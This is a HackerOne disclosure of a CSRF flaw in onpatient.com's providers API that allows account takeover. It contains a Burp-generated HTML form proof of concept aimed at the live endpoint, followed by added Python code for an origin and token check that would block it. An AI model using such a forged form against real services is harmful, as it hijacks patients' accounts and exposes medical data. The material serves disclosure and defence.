drchrono: [CRITICAL] CSRF leading to account take over

2016-05-27T04:08:39
ID H1:141344
Type hackerone
Reporter sysecure
Modified 2016-06-14T22:54:02

Description

Hi, I have found a CSRF issue that allows an attacker to link his email account to the victim's account and hijack the whole account by adding himself to the providers list.

The link: https://onpatient.com/api/v3/providers

Content-Type: application/json
Vary: Accept
Allow: GET, POST, HEAD, OPTIONS

[ emails of providers ]

Here is the PoC:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <div class="tab-pane active" id="post-object-form">
      <form action="https://onpatient.com/api/v3/providers" method="POST" enctype="multipart/form-data" class="form-horizontal" novalidate="">
        <fieldset>
          <input type="hidden" name="csrfmiddlewaretoken" value="oCSe26NkXpcEJ0X6MQzpZvFVfGY9M5yX">

          <div class="form-group">
            <label class="col-sm-2 control-label">Patient</label>
            <div class="col-sm-10">
              <select class="form-control" name="patient">
                <option value="213477">saleh ss</option>
              </select>
            </div>
          </div>

          <div class="form-group">
            <label class="col-sm-2 control-label">Name</label>
            <div class="col-sm-10">
              <input name="name" class="form-control" type="text">
            </div>
          </div>

          <div class="form-group">
            <label class="col-sm-2 control-label">Specialty</label>
            <div class="col-sm-10">
              <input name="specialty" class="form-control" type="text">
            </div>
          </div>

          <div class="form-group">
            <label class="col-sm-2 control-label">Fax</label>
            <div class="col-sm-10">
              <input name="fax" class="form-control" type="text">
            </div>
          </div>

          <div class="form-group">
            <label class="col-sm-2 control-label">Email</label>
            <div class="col-sm-10">
              <input name="email" class="form-control" type="email">
            </div>
          </div>

          <div class="form-group">
            <label class="col-sm-2 control-label">Phone</label>
            <div class="col-sm-10">
              <input name="phone" class="form-control" type="text">
            </div>
          </div>

          <div class="form-group">
            <label class="col-sm-2 control-label">Address</label>
            <div class="col-sm-10">
              <textarea name="address" class="form-control"></textarea>
            </div>
          </div>

          <!-- form.non_field_errors -->

          <div class="form-actions">
            <button class="btn btn-primary" title="Make a POST request on the Provider List resource">POST</button>
          </div>
        </fieldset>
      </form>
    </div>
  </body>
</html>
```
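The report shows a cookie-authenticated API endpoint accepting a state-changing POST submitted from a third-party page. The check below is an added example of the server-side gate such an endpoint needs; it is illustrative code written for this page, not drchrono's or Django's implementation. It assumes the application's own origin is `https://onpatient.com`, reuses the Django cookie name `csrftoken` and the field name `csrfmiddlewaretoken` visible in the PoC as names only (Django's real token scheme additionally masks the token), and runs over two constructed requests: a same-origin submission with a matching token, and a cross-site submission of the kind the PoC produces, where the victim's browser attaches the session cookie but the page origin and the embedded token belong to the attacker.

```python
"""Minimal CSRF gate for a cookie-authenticated endpoint (added example)."""
import hmac
from urllib.parse import urlsplit

# Assumption: the only origin allowed to submit state-changing requests.
ALLOWED_ORIGINS = {"https://onpatient.com"}
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
CSRF_COOKIE = "csrftoken"            # Django's default cookie name (assumed here)
CSRF_FIELD = "csrfmiddlewaretoken"   # the hidden field name seen in the PoC


def _lower_keys(d):
    return {k.lower(): v for k, v in d.items()}


def request_origin(headers):
    """Return scheme://host[:port] the browser reports for the request.
    Prefers Origin, falls back to Referer; None when neither is usable.
    Browsers set these themselves, so a cross-site form post cannot hide
    that it came from another site."""
    h = _lower_keys(headers)
    origin = h.get("origin")
    if origin and origin != "null":
        return origin
    referer = h.get("referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return f"{parts.scheme}://{parts.netloc}"
    return None


def is_csrf_safe(method, headers, cookies, form):
    """True only when a state-changing request passes both checks:
    1. the reported origin is one of ours, and
    2. the token in the form equals the token in the CSRF cookie
       (double-submit), compared in constant time.
    Safe methods are allowed through; they must not change state."""
    if method.upper() in SAFE_METHODS:
        return True
    if request_origin(headers) not in ALLOWED_ORIGINS:
        return False
    cookie_token = cookies.get(CSRF_COOKIE)
    form_token = form.get(CSRF_FIELD)
    if not cookie_token or not form_token:
        return False
    return hmac.compare_digest(cookie_token.encode(), form_token.encode())


# Constructed sample requests (not captured traffic).
LEGIT_POST = {
    "method": "POST",
    "headers": {"Origin": "https://onpatient.com"},
    "cookies": {"sessionid": "victim-session", CSRF_COOKIE: "tokenA"},
    "form": {CSRF_FIELD: "tokenA", "email": "doctor@example.com"},
}
# Server-side view of a cross-site submission like the PoC: the victim's
# session cookie rides along, but the origin and the pasted token do not match.
CROSS_SITE_POST = {
    "method": "POST",
    "headers": {"Origin": "https://attacker.example"},
    "cookies": {"sessionid": "victim-session", CSRF_COOKIE: "tokenA"},
    "form": {CSRF_FIELD: "stale-token", "email": "attacker@example.com"},
}


def check(req):
    """Run the gate over one of the sample request dicts above."""
    return is_csrf_safe(req["method"], req["headers"], req["cookies"], req["form"])


if __name__ == "__main__":
    print("same-origin, matching token:", check(LEGIT_POST))
    print("cross-site, attacker token:  ", check(CROSS_SITE_POST))
```

Either check alone would have stopped the PoC: the origin check rejects it because the browser labels the request with the attacker's page, and the token check rejects it because the attacker cannot read the victim's `csrftoken` cookie to put a matching value in the form. Enforcing both, and marking the session cookie `SameSite`, is the usual layered defence for session-authenticated APIs.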